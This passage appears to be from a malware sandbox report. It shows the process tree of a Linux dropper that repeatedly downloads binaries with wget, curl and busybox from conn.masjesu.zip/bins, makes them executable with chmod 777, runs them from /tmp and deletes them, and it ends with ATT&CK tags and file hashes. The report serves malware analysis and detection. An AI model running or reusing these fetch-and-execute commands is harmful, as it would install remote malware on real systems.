-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵PID:944
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:958
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:972
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97